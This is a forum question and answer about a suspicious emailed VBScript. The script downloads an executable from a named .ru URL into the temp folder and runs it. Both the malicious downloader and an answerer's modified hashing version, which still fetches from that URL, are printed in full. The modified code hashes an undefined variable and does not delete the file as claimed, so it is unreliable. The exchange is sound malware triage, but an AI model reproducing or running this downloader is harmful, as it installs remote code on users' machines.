CODEWITHSUNDEEP
vbscriptvirus
A. Kuc
A. Kuc

Reputation: 21

Possible Extortion of Data

someone sent me an email with a vbs script, but I don't know what it is as I don't know vbs.

I am guessing this is a swindle to extort some data from me, but I can't really tell what data. Can someone please exlpain what would that scrtipt do?

Sub HTTPUpload( myURL, myPath )
Dim objShell
Set objShell = WScript.CreateObject( "WScript.Shell" )
Dim i, objFile, objFSO, objHTTP, strFile, strMsg
Const ForReading = 1, ForWriting = 2, ForAppending = 8
Set objFSO = CreateObject( "Scripting.FileSystemObject" )
Const TemporaryFolder = 2
Set tfolder = objFSO.GetSpecialFolder(TemporaryFolder)
tname = objFSO.GetTempName + ".exe"
myPath = tfolder + "/" + tname
Set objFile = tfolder.CreateTextFile(tname)
Set objHTTP = CreateObject( "WinHttp.WinHttpRequest.5.1" )
objHTTP.Open "GET", myURL, False
objHTTP.Send
For i = 1 To LenB( objHTTP.ResponseBody )
    objFile.Write Chr( AscB( MidB( objHTTP.ResponseBody, i, 1 ) ) )
Next
objFile.Close( )
objShell.Run(myPath)
Set objShell = Nothing
End Sub
HTTPUpload "http://baikalmix.ru/bitrix/js/seo/.../log.php?f=404", ""

Upvotes: 2

Views: 181

Answers (1)

Steve Kline
Steve Kline

Reputation: 805

As the other guy stated, it could very well be a virus. It's downloading binary data, writing it as an EXE and firing itself off.. You could modify it with this code below. ... You could also just delete the email and forget that dude. I know not "Everyone" is as crazy as some of us when it comes to finding viruses in the wild.. we hoard these things and study them.

I've amended some changes that would provide you with a MD5 Hash and SHA256 Hash that's searchable on VirusTotal and delete the file immediately after. You just need to re-append that line for httpUpload... and it will download... but if you see below I removed the line that was attempting to use the .Run method.

HTTPUpload "http://baikalmix.ru/bitrix/js/seo/.../log.php?f=404", ""

The link you provided is cut off, but if you still have the vbs file, then just remove that whole section of Sub HttpUpload thru End Sub which was right before it... Replace the entire content of the vbs file except for that line mentioned above.

Sub HTTPUpload( myURL, myPath )
    Dim objShell
    Set objShell = WScript.CreateObject( "WScript.Shell" )
    Dim i, objFile, objFSO, objHTTP, strFile, strMsg
    Const ForReading = 1, ForWriting = 2, ForAppending = 8
    Set objFSO = CreateObject( "Scripting.FileSystemObject" )
    Const TemporaryFolder = 2
    Set tfolder = objFSO.GetSpecialFolder(TemporaryFolder)
    tname = objFSO.GetTempName + ".exe"
    myPath = tfolder + "/" + tname
    Set objFile = tfolder.CreateTextFile(tname)
    Set objHTTP = CreateObject( "WinHttp.WinHttpRequest.5.1" )
    objHTTP.Open "GET", myURL, False
    objHTTP.Send
    For i = 1 To LenB( objHTTP.ResponseBody )
        objFile.Write Chr( AscB( MidB( objHTTP.ResponseBody, i, 1 ) ) )
    Next
    objFile.Close( )
    wscript.echo "    MD5Hash: " & MD5Hash(sPath) & VbCrLf & " SHA256Hash: " & Sha256Hash(sPath)
    Set objShell = Nothing
End Sub

Function MD5Hash(sPath)
    MD5Hash = bytesToHex(MD5HashBytes(GetBytes(sPath)))
End Function
Function Sha256Hash(sPath)
    Sha256Hash = bytesToHex(Sha256HashBytes(GetBytes(sPath)))
End Function

Function MD5HashBytes(aBytes)
    Set objmd5 = CreateObject("System.Security.Cryptography.MD5CryptoServiceProvider")
    objmd5.Initialize()
    MD5HashBytes = objmd5.ComputeHash_2( (aBytes) )
End Function

Function Sha256HashBytes(aBytes)
    'Set objsha256 = CreateObject("System.Security.Cryptography.MD5CryptoServiceProvider")
    Set objsha256 = CreateObject("System.Security.Cryptography.SHA256Managed")
    objsha256.Initialize()
    Sha256HashBytes = objsha256.ComputeHash_2( (aBytes) )
End Function

Function StringtoUTFBytes(aString)
    Set UTF8 = CreateObject("System.Text.UTF8Encoding")
    StringtoUTFBytes = UTF8.GetBytes_4(aString)
End Function

Function BytesToHex(aBytes)
    For x = 1 to LenB(aBytes)
        hexStr=Hex(Ascb(MidB((aBytes), x, 1)))
        if len(hexStr) = 1 Then hexStr ="0" & hexStr
        bytesToHex=BytesToHex & hexStr
    Next
End Function

Function BytesToBase64(varBytes)
    With CreateObject("MSXML2.DomDocument").CreateElement("b64")
        .dataType = "bin.base64"
        .nodeTypedValue = varBytes
        BytesToBase64 = .Text
    End With
End Function

Function GetBytes(sPath)
    With CreateObject("ADODB.Stream")
        .Type = 1
        .open
        .LoadFromFile sPath
        .Position = 0
        GetBytes = .Read
        .Close
    End With
End Function

Upvotes: 2

Related Questions